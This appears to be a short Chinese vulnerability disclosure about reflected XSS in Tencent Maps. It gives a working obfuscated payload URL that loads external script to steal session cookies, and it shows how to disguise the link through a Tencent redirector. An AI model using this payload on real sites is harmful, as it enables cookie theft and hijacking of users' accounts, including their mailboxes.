腾讯地图xss导致可获取Cookie可登陆部分业务

腾讯gg 又有新的xss了 = =

详细说明:

直接说

http://navs.map.qq.com/

腾讯地图



应该是过滤不严

code 区域
111



然后分享给别人 xss地址

http://jump.qt.qq.com/php/jump/check_url/?url=http://www.******.com/xs/



别人一点 就呵呵了

漏洞证明:





有vkey 还可以进 邮箱









http://navs.map.qq.com/?type=marker&isopeninfowin=1&markertype=1&pointx=116.342763&pointy=39.892326&name=111%253Cim%5Cg%20src%3Dx%20on%5Cerr%5Cor%3De%5Cval%28at%5Cob%28%2527cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzLmpzJw%253D%253D%2527%29%29%253E&addr=111

你可能感兴趣的:(xss之类的)